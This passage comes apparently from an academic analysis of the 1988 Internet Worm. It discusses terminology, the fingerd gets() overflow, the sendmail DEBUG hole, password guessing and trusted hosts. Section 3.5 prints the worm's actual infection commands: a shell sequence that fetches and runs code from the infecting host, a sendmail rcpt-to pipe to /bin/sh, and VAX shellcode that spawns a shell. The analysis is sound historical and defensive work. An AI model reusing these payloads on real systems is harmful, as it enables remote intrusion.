propagate a fully working version of itselfto other machines.It is derived from the word tapeworm,a parasitic organism that lives inside a host and uses its resources to maintain itself.A virus is a piece of code that adds itself to other programs,including operating systems.It cannotrun independently—it requires that its‘‘host’’program be run to activate it.As such,it has an ana-log to biological viruses—those viruses are not considered alive in the usual sense;instead,they invade host cells and corrupt them,causing them to produce new viruses.2.1.WormsThe concept of a worm program that spreads itself from machine to machine was apparentlyfirst described by John Brunner in1975in his classic sciencefiction novel The Shockwave Rider.[5]He called these programs tapeworms that existed‘‘inside’’the computers and spread themselves to other machines. Ten years ago,researchers at Xerox PARC built and experimented with worm programs.They reported their experiences in1982in[25],and cited Brunner as the inspiration for the name worm.Although not thefirst self-replicating programs to run in a network environment,these were thefirst such programs to be called worms.The worms built at PARC were designed to travel from machine to machine and do useful work in a distributed environment—they were not used at that time to break into systems.Because of this,some people prefer to call the Internet Worm a virus because it was destructive,and they believe worms are non-destructive.Not everyone agrees that the Internet Worm was destructive,however.Since intent and effect are sometimes difficult to judge because we lack complete information and have different definitions of those terms,using them as a naming criterion is clearly insufficient.Unless a different naming scheme is generally adopted,programs such as this one should be called worms because of their method of propagation.2.2.VirusesThefirst published use of the word virus(to my knowledge)to describe something that infects a computer was by David Gerrold in his sciencefiction short stories about the G.O.D.machine.These stories were later combined and expanded to form the book When Harlie Was One.[12]A subplot in that book described a program named VIRUS created by an unethical scientist.*A computer infected with VIRUS would randomly dial the phone until it found another computer.It would then break into that system and infect it with a copy of VIRUS.This program would infiltrate the system software and slow the system down so much that it became unusable(except to infect other machines).The inventor had plans to sell a program named VACCINE that could cure VIRUS and prevent infection,but disaster occurred when noise on a phone line caused VIRUS to mutate so VACCINE ceased to be effective.The term computer virus wasfirst used in a formal way by Fred Cohen at USC.[6]He defined the term to mean a security problem that attaches itself to other code and turns it into something that pro-duces viruses;to quote from his paper:‘‘We define a computer‘virus’as a program that can infect other programs by modifying them to include a possibly evolved copy of itself.’’He claimed thefirst com-puter virus was‘‘born’’on November3,1983,written by himself for a security seminar course,†and in his Ph.D.dissertation he credited his advisor,L.Adleman,with originating the terminology.However, there are accounts of virus programs being created at least a year earlier,including one written by a stu-dent at Texas A&M during early1982.*2.3.An Opposing ViewIn a widely circulated paper[10],Eichin and Rochlis chose to call the November2nd program a virus.Their reasoning for this required reference to biological literature and observing distinctions between lytic viruses and lysogenic viruses.It further requires that we view the Internet as a whole to be the infected host rather than each individual machine.Their explanation merely serves to underscore the dangers of co-opting terms from another discip-line to describe phenomena within our own(computing).The original definitions may be much more complex than we originally imagine,and attempts to maintain and justify the analogies may require a considerable effort.Here,it may also require an advanced degree in the biological sciences!The definitions of worm and virus I have given,based on Cohen’s and Denning’s definitions,do not require detailed knowledge of biology or pathology.They also correspond well with our traditional understanding of what a computer‘‘host’’is.Although Eichin and Rochlis present a reasoned argument for a more precise analogy to biological viruses,we should bear in mind that the nomenclature has been adopted for the use of computer professionals and not biologists.The terminology should be descriptive, unambiguous,and easily ing a nonintuitive definition of a‘‘computer host,’’and introduc-ing unfamiliar terms such as lysogenic does not serve these goals well.As such,the term worm should continue to be the name of choice for this program and others like it.3.How the Worm OperatedThe Worm took advantage offlaws in standard software installed on many U NIX systems.It also took advantage of a mechanism used to simplify the sharing of resources in local area networks.Specific patches for theseflaws have been widely circulated in days since the Worm program attacked the Inter-net.Thoseflaws are described here,along with some related problems,since we can learn something about software design from them.This is then followed by a description of how the Worm used the flaws to invade systems.*The second edition of the book,recently published,has been‘‘updated’’to omit this subplot about VIRUS.†It is ironic that the Internet Worm was loosed on November2,the eve of this‘‘birthday.’’*Private communication,Joe Dellinger.3.1.fingerd and getsThe finger program is a utility that allows users to obtain information about other users.It is usu-ally used to identify the full name or login name of a user,whether a user is currently logged in,and pos-sibly other information about the person such as telephone numbers where he or she can be reached.The fingerd program is intended to run as a daemon,or background process,to service remote requests using thefinger protocol.[14]This daemon program accepts connections from remote programs,reads a single line of input,and then sends back output matching the received request.The bug exploited to break fingerd involved overrunning the buffer the daemon used for input.The standard C language I/O library has a few routines that read input without checking for bounds on the buffer involved.In particular,the gets call takes input to a buffer without doing any bounds checking; this was the call exploited by the Worm.As will be explained later,the input overran the buffer allocated for it and rewrote the stack frame,thus altering the behavior of the program.The gets routine is not the only routine with thisflaw.There is a whole family of routines in the C library that may also overrun buffers when decoding input or formatting output unless the user explicitly specifies limits on the number of characters to be converted.Although experienced C programmers are aware of the problems with these routines,many con-tinue to use them.Worse,their format is in some sense codified not only by historical inclusion in U NIX and the C language,but more formally in the forthcoming ANSI language standard for C.The hazard with these calls is that any network server or privileged program using them may possibly be comprom-ised by careful precalculation of the(in)appropriate input.Interestingly,at least two long-standingflaws based on this underlying problem have recently been discovered in other standard BSD U NIX commands.Program audits by various individuals have revealed other potential problems,and many patches have been circulated since November to deal with these flaws.Despite this,the library routines will continue to be used,and as our memory of this incident fades,newflaws may be introduced with their use.3.2.SendmailThe sendmail program is a mailer designed to route mail in a heterogeneous internetwork.[3]The program operates in several modes,but the one exploited by the Worm involves the mailer operating as a daemon(background)process.In this mode,the program is‘‘listening’’on a TCP port(#25)for attempts to deliver mail using the standard Internet protocol,SMTP(Simple Mail Transfer Protocol).[20] When such an attempt is detected,the daemon enters into a dialog with the remote mailer to determine sender,recipient,delivery instructions,and message contents.The bug exploited in sendmail had to do with functionality provided by a debugging option in the code.The Worm would issue the DEBUG command to sendmail and then specify the recipient of the message as a set of commands instead of a user address.In normal operation,this is not allowed,but it is present in the debugging code to allow testers to verify that mail is arriving at a particular site without the need to invoke the address resolution routines.By using this feature,testers can run programs to display the state of the mail system without sending mail or establishing a separate login connection. This debug option is often used because of the complexity of configuring sendmail for local conditions and it is often left turned on by many vendors and site administrators.The sendmail program is of immense importance on most Berkeley-derived(and other)U NIX sys-tems because it handles the complex tasks of mail routing and delivery.Yet,despite its importance and widespread use,most system administrators know little about how it works.Stories are often related about how system administrators will attempt to write new device drivers or otherwise modify the kernel of the operating system,yet they will not willingly attempt to modify sendmail or its configurationfiles.It is little wonder,then,that bugs are present in sendmail that allow unexpected behavior.Other flaws have been found and reported now that attention has been focused on the program,but it is not known for sure if all the bugs have been discovered and all the patches circulated.3.3.PasswordsA key attack of the Worm program involved attempts to discover user passwords.It was able to determine success because the encrypted password*of each user was in a publicly-readablefile.In U NIX systems,the user provides a password at sign-on to verify identity.The password is encrypted using a permuted version of the Data Encryption Standard(DES)algorithm,and the result is compared against a previously encrypted version present in a world-readable accountingfile.If a match occurs,access is allowed.No plaintext passwords are contained in thefile,and the algorithm is supposedly non-invertible without knowledge of the password.The organization of the passwords in U NIX allows non-privileged commands to make use of infor-mation stored in the accountsfile,including authentification schemes using user passwords.However,it also allows an attacker to encrypt lists of possible passwords and then compare them against the actual passwords without calling any system function.In effect,the security of the passwords is provided by the prohibitive effort of trying this approach with all combinations of letters.Unfortunately,as machines get faster,the cost of such attempts decreases.Dividing the task among multiple processors further reduces the time needed to decrypt a password.Such attacks are also made easier when users choose obvious or common words for their passwords.An attacker need only try lists of common words until a match is found.The Worm used such an attack to break passwords.It used lists of words,including the standard online dictionary,as potential passwords.It encrypted them using a fast version of the password algo-rithm and then compared the result against the contents of the systemfile.The Worm exploited the accessibility of thefile coupled with the tendency of users to choose common words as their passwords. Some sites reported that over50%of their passwords were quickly broken by this simple approach.One way to reduce the risk of such attacks,and an approach that has already been taken in some variants of U NIX,is to have a shadow passwordfile.The encrypted passwords are saved in afile(sha-dow)that is readable only by the system administrators,and a privileged call performs password encryp-tions and comparisons with an appropriate timed delay(.5to1second,for instance).This would prevent any attempt to‘‘fish’’for passwords.Additionally,a threshold could be included to check for repeated password attempts from the same process,resulting in some form of alarm being raised.Shadow pass-wordfiles should be used in combination with encryption rather than in place of such techniques,how-ever,or one problem is simply replaced by a different one(securing the shadowfile);the combination of the two methods is stronger than either one alone.Another way to strengthen the password mechanism would be to change the utility that sets user passwords.The utility currently makes minimal attempt to ensure that new passwords are nontrivial to guess.The program could be strengthened in such a way that it would reject any choice of a word currently in the on-line dictionary or based on the account name.A relatedflaw exploited by the Worm involved the use of trusted logins.One useful features of BSD U NIX-based networking code is its support for executing tasks on remote machines.To avoid hav-ing repeatedly to type passwords to access remote accounts,it is possible for a user to specify a list of host/login name pairs that are assumed to be‘‘trusted,’’in the sense that a remote access from that host/login pair is never asked for a password.This feature has often been responsible for users gaining unauthorized access to machines(cf.[21]),but it continues to be used because of its great convenience.The Worm exploited the mechanism by trying to locate machines that might‘‘trust’’the current machine/login being used by the Worm.This was done by examiningfiles that listed remote machine/logins trusted by the current host.*Often,machines and accounts are configured for reciprocal trust.Once the Worm found such likely candidates,it would attempt to instantiate itself on those machines by using the remote execution facility—copying itself to the remote machines as if it were an authorized user performing a standard remote operation.*Strictly speaking,the password is not encrypted.A block of zero bits is repeatedly encrypted using the user pass-word,and the results of this encryption is what is saved.See[4]and[19]for more details.*The hosts.equiv and per-user.rhostsfiles referred to later.To defeat future such attempts requires that the current remote access mechanism be removed and possibly replaced with something else.One mechanism that shows promise in this area is the Kerberos authentification server[28].This scheme uses dynamic session keys that need to be updated periodically. Thus,an invader could not make use of static authorizations present in thefile system.3.4.High Level DescriptionThe Worm consisted of two parts:a main program,and a bootstrap or vector program.The main program,once established on a machine,would collect information on other machines in the network to which the current machine could connect.It would do this by reading public configurationfiles and by running system utility programs that present information about the current state of network connections. It would then attempt to use theflaws described above to establish its bootstrap on each of those remote machines.The bootstrap was99lines of C code that would be compiled and run on the remote machine.The source for this program would be transferred to the victim machine using one of the methods discussed in the next section.It would then be compiled and invoked on the victim machine with three command line arguments:the network address of the infecting machine,the number of the network port to connect to on that machine to get copies of the main Wormfiles,and a magic number that effectively acted as a one-time-challenge password.If the‘‘server’’Worm on the remote host and port did not receive the same magic number back before starting the transfer,it would immediately disconnect from the vector pro-gram.This may have been done to prevent someone from attempting to‘‘capture’’the binaryfiles by spoofing a Worm‘‘server.’’This code also went to some effort to hide itself,both by zeroing out its argument vector(command line image),and by immediately forking a copy of itself.If a failure occurred in transferring afile,the code deleted allfiles it had already transferred,then it exited.Once established on the target machine,the bootstrap would connect back to the instance of the Worm that originated it and transfer a set of binaryfiles(precompiled code)to the local machine.Each binaryfile represented a version of the main Worm program,compiled for a particular computer architec-ture and operating system version.The bootstrap would also transfer a copy of itself for use in infecting other systems.One curious feature of the bootstrap has provoked many questions,as yet unanswered:the program had data structures allocated to enable transfer of up to20files;it was used with only three. This has led to speculation whether a more extensive version of the Worm was planned for a later date, and if that version might have carried with it other commandfiles,password data,or possibly local virus or trojan horse programs.Once the binaryfiles were transferred,the bootstrap program would load and link thesefiles with the local versions of the standard libraries.One after another,these programs were invoked.If one of them ran successfully,it read into its memory copies of the bootstrap and binaryfiles and then deleted the copies on disk.It would then attempt to break into other machines.If none of the linked versions ran, then the mechanism running the bootstrap(a commandfile or the parent worm)would delete all the disk files created during the attempted infection.3.5.Step-by-step descriptionThis section contains a more detailed overview of how the Worm program functioned.The description in this section assumes that the reader is somewhat familiar with standard U NIX commands and with BSD U NIX network facilities.A more detailed analysis of operation and components can be found in[26],with additional details in[10]and[24].This description starts from the point at which a host is about to be infected.A Worm running on another machine has either succeeded in establishing a shell on the new host and has connected back to the infecting machine via a TCP connection,*or it has connected to the SMTP port and is transmitting to the sendmail program.*Internet reliable stream connection.The infection proceeded as follows:1)A socket was established on the infecting machine for the vector program to connect to(e.g.,socketnumber32341).A challenge string was constructed from a random number(e.g.,8712440).Afilename base was also constructed using a random number(e.g.,14481910).2)The vector program was installed and executed using one of two methods:2a)Across a TCP connection to a shell,the Worm would send the following commands(the twolines beginning with‘‘cc’’were sent as a single line):PATH=/bin:/usr/bin:/usr/ucbcd/usr/tmpecho gorch49;sed’/int zz/q’>x14481910.c;echo gorch50[text of vector program]int zz;cc-o x14481910x14481910.c;./x14481910128.32.134.16323418712440;rm-f x14481910x14481910.c;echo DONEThen it would wait for the string‘‘DONE’’to signal that the vector program was running.2b)Using the SMTP connection,it would transmit(the two lines beginning with‘‘cc’’were sentas a single line):debugmail from:</dev/null>rcpt to:<"|sed-e’1,/^$/’d|/bin/sh;exit0">datacd/usr/tmpcat>x14481910.c<<’EOF’[text of vector program]EOFcc-o x14481910x14481910.c;x14481910128.32.134.16323418712440;rm-f x14481910x14481910.c.quitThe infecting Worm would then wait for up to2minutes on the designated port for the vector tocontact it.3)The vector program then connected to the‘‘server,’’sent the challenge string,and transferred threefiles:a Sun3binary version of the Worm,a V AX version,and the source code for the vector pro-gram.After thefiles were copied,the running vector program became(via the execl call)a shellwith its input and output still connected to the server Worm.4)The server Worm sent the following command stream to the connected shell:PATH=/bin:/usr/bin:/usr/ucbrm-f shif[-f sh]thenP=x14481910elseP=shfiThen,for each binaryfile it had transferred(just two in this case,although the code is written to allow more),it would send the following form of command sequence:cc-o$P x14481910,sun3.o./$P-p$$x14481910,sun3.o x14481910,vax.o x14481910,l1.c rm-f$PThe rm would succeed only if the linked version of the Worm failed to start execution.If the server determined that the host was now infected,it closed the connection.Otherwise,it would try the other binaryfile.After both binaryfiles had been tried,it would send over rm commands for the objectfiles to clear away all evidence of the attempt at infection.5)The new Worm on the infected host proceeded to‘‘hide’’itself by obscuring its argument vector,unlinking the binary version of itself,and killing its parent(the$$argument in the invocation).It then read into memory each of the Worm binaryfiles,encrypted eachfile after reading it,and deleted thefiles from disk.6)Next,the new Worm gathered information about network interfaces and hosts to which the localmachine was connected.It built lists of these in memory,including information about canonical and alternate names and addresses.It gathered some of this information by making direct ioctl calls,and by running the netstat program with various arguments.*It also read through various sys-temfiles looking for host names to add to its database.7)It randomized the lists of hosts it constructed,then attempted to infect some of them.For directlyconnected networks,it created a list of possible host numbers and attempted to infect those hosts if they existed.Depending on whether the host was remote or attached to a local area network the Wormfirst tried to establish a connection on the telnet or rexec ports to determine reachability before it attempted an infection.8)The infection attempts proceeded by one of three routes:rsh,fingerd,or sendmail.8a)The attack via rsh was done by attempting to spawn a remote shell by invocation of(in order of trial)/usr/ucb/rsh,/usr/bin/rsh,and/bin/rsh.If successful,the host was infected as in steps1and2a,above.8b)The attack via the finger daemon was somewhat more subtle.A connection was established to the remote finger server daemon and then a specially constructed string of536bytes waspassed to the daemon,overflowing its512byte input buffer and overwriting parts of thestack.For standard4BSD versions running on V AX computers,the overflow resulted in thereturn stack frame for the main routine being changed so that the return address pointed intothe buffer on the stack.The instructions that were written into the stack at that location werea series of no-ops followed by:pushl$68732f’/sh\0’pushl$6e69622f’/bin’movl sp,r10pushl$0pushl$0pushl r10pushl$3movl sp,apchmk$3bThat is,the code executed when the main routine attempted to return was:*Ioctl is a U NIX call to do device queries and stat is a status and monitor program showing the state ofnetwork connections.。